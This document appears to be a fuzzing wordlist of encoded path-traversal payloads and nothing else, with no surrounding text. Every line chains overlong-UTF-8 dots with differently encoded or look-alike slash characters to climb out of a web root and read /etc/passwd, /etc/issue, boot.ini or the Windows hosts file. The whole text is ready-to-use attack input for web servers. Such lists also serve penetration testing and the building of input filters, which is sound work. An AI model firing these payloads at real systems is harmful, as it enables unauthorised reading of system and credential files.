-%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qf%e0%80%ae%e0%80%ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%e0%80%ae%e0%80%ae%c1%8setc%c1%8spasswd -%e0%80%ae%e0%80%ae%c1%8setc%c1%8sissue -%e0%80%ae%e0%80%ae%c1%8sboot.ini -%e0%80%ae%e0%80%ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8setc%c1%8spasswd -%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8setc%c1%8sissue -%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8sboot.ini -%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8setc%c1%8spasswd -%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8setc%c1%8sissue -%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8sboot.ini -%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8setc%c1%8spasswd -%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8setc%c1%8sissue -%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8sboot.ini -%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8setc%c1%8spasswd -%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8setc%c1%8sissue -%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8sboot.ini -%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8setc%c1%8spasswd -%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8setc%c1%8sissue -%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8sboot.ini -%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8s%e0%80%ae%e0%80%ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%e0%80%ae%e0%80%ae%c1%1cetc%c1%1cpasswd -%e0%80%ae%e0%80%ae%c1%1cetc%c1%1cissue -%e0%80%ae%e0%80%ae%c1%1cboot.ini -%e0%80%ae%e0%80%ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1cetc%c1%1cpasswd -%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1cetc%c1%1cissue -%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1cboot.ini -%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1cetc%c1%1cpasswd -%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1cetc%c1%1cissue -%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1cboot.ini -%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1cetc%c1%1cpasswd -%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1cetc%c1%1cissue -%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1cboot.ini -%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1cetc%c1%1cpasswd -%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1cetc%c1%1cissue -%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1cboot.ini -%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1cetc%c1%1cpasswd -%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1cetc%c1%1cissue -%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1cboot.ini -%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1c%e0%80%ae%e0%80%ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%e0%80%ae%e0%80%ae%c1%afetc%c1%afpasswd -%e0%80%ae%e0%80%ae%c1%afetc%c1%afissue -%e0%80%ae%e0%80%ae%c1%afboot.ini -%e0%80%ae%e0%80%ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%afetc%c1%afpasswd -%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%afetc%c1%afissue -%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%afboot.ini -%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%afetc%c1%afpasswd -%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%afetc%c1%afissue -%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%afboot.ini -%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%afetc%c1%afpasswd -%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%afetc%c1%afissue -%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%afboot.ini -%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%afetc%c1%afpasswd -%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%afetc%c1%afissue -%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%afboot.ini -%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%afetc%c1%afpasswd -%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%afetc%c1%afissue -%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%afboot.ini -%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%af%e0%80%ae%e0%80%ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%e0%80%ae%e0%80%ae%bg%qfetc%bg%qfpasswd -%e0%80%ae%e0%80%ae%bg%qfetc%bg%qfissue -%e0%80%ae%e0%80%ae%bg%qfboot.ini -%e0%80%ae%e0%80%ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qfetc%bg%qfpasswd -%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qfetc%bg%qfissue -%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qfboot.ini -%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qfetc%bg%qfpasswd -%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qfetc%bg%qfissue -%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qfboot.ini -%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qfetc%bg%qfpasswd -%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qfetc%bg%qfissue -%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qfboot.ini -%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qfetc%bg%qfpasswd -%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qfetc%bg%qfissue -%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qfboot.ini -%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qfetc%bg%qfpasswd -%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qfetc%bg%qfissue -%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qfboot.ini -%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qf%e0%80%ae%e0%80%ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%e0%80%ae%e0%80%ae%u2215etc%u2215passwd -%e0%80%ae%e0%80%ae%u2215etc%u2215issue -%e0%80%ae%e0%80%ae%u2215boot.ini -%e0%80%ae%e0%80%ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215etc%u2215passwd -%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215etc%u2215issue -%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215boot.ini -%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215etc%u2215passwd -%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215etc%u2215issue -%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215boot.ini -%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215etc%u2215passwd -%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215etc%u2215issue -%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215boot.ini -%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215etc%u2215passwd -%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215etc%u2215issue -%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215boot.ini -%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215etc%u2215passwd -%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215etc%u2215issue -%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215boot.ini -%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215%e0%80%ae%e0%80%ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%e0%80%ae%e0%80%ae%u2216etc%u2216passwd -%e0%80%ae%e0%80%ae%u2216etc%u2216issue -%e0%80%ae%e0%80%ae%u2216boot.ini -%e0%80%ae%e0%80%ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216etc%u2216passwd -%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216etc%u2216issue -%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216boot.ini -%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216etc%u2216passwd -%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216etc%u2216issue -%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216boot.ini -%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216etc%u2216passwd -%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216etc%u2216issue -%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216boot.ini -%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216etc%u2216passwd -%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216etc%u2216issue -%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216boot.ini -%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216etc%u2216passwd -%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216etc%u2216issue -%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216boot.ini -%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216%e0%80%ae%e0%80%ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%e0%80%ae%e0%80%ae%uEFC8etc%uEFC8passwd -%e0%80%ae%e0%80%ae%uEFC8etc%uEFC8issue -%e0%80%ae%e0%80%ae%uEFC8boot.ini -%e0%80%ae%e0%80%ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8etc%uEFC8passwd -%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8etc%uEFC8issue -%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8boot.ini -%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8etc%uEFC8passwd -%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8etc%uEFC8issue -%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8boot.ini -%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8etc%uEFC8passwd -%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8etc%uEFC8issue -%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8boot.ini -%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8etc%uEFC8passwd -%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8etc%uEFC8issue -%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8boot.ini -%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8%e0%80%ae%e0%80%ae%uEFC8etc%uEFC8passwd 